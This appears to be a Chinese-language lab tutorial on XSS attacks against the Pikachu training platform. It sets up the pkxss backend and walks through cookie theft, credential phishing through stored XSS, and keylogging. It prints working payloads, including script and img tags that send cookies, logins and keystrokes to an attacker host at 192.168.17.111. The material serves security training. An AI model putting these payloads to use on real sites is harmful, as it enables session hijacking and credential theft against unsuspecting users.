XSS-漏洞測試案例
xss案例
1.cookie的竊取和利用
2.釣魚攻擊
3.XSS獲取鍵盤記錄
在進行案例之前首先要搭建xss后台
搭建xss后台
1.在pikachu文件夾下面,把pkxss單獨放在www下面;
2.修改配置文件 數據庫服務器地址,賬號,密碼;
3.登錄;
4.安裝;
5.修改,重定向到一個可信的網站(令點擊者不知情);
后台登陸成功;
一. get型xss cookie值獲取
首先修改字符輸入長度;
輸入框輸入
<script>document.location='http://192.168.17.111/pkxss/xcookie/cookie.php?cookie=' +document.cookie;</script> 點擊提交;就會跳轉到首頁面;
其中referer
用戶一旦訪問這個鏈接,它只會跳轉到首頁面,但是我們這樣就已經獲取到cookie值
Post型xss cookie值獲取
首先登陸;
查看pkxss-xcookie-post.html文件;
用戶訪問欺騙的跳轉頁面,就會在pxss獲取到cookie值。
二. 釣魚演示(存儲型xss)
進入文件修改ip;
給出認證框,用戶輸入用戶名、密碼,重定向到后台
同樣的后台也有同樣的接口,get方式獲取到用戶名跟密碼然后存儲;
回到存儲型xss留言板 輸入
<img src=" http://192.168.17.111/pkxss/xfish/fish.php" /> img標簽
<script src=" http://192.168.17.111/pkxss/xfish/fish.php"> </script> script標簽
刷新之后還會有這個彈窗;
輸入用戶名 密碼 admin root
返回pkxss后台界面,刷新就會有剛才的獲取到的信息。
三.XSS獲取鍵盤記錄
跨域:http:// www . gxy.com :8080 / script/test.js
協議 子域名 主域名 端口 資源地址
當協議、主機、端口的任意一個不相同時,稱不同域
將不同域之間的請求數據操作,稱跨域操
下面這些標簽可以跨域加載資源
<script src=”…”>//js,加載到本地執行
<img src=”…”>//圖片
<link href=”…”>//css
<iframe src=“…”>//任意資源
存入到數據庫中;
把js 文件放到被攻擊者的頁面當中,通過獲取鍵盤值,post發送給攻擊者后台;
存儲型xss 留言板 輸入
<script src=" http://192.168.17.111/pkxss/xkeypress/rk.php"> </script>
在鍵盤上隨便輸入發現顯示頁面請求失敗
在pkxss后台我們就可以看到獲取的信息。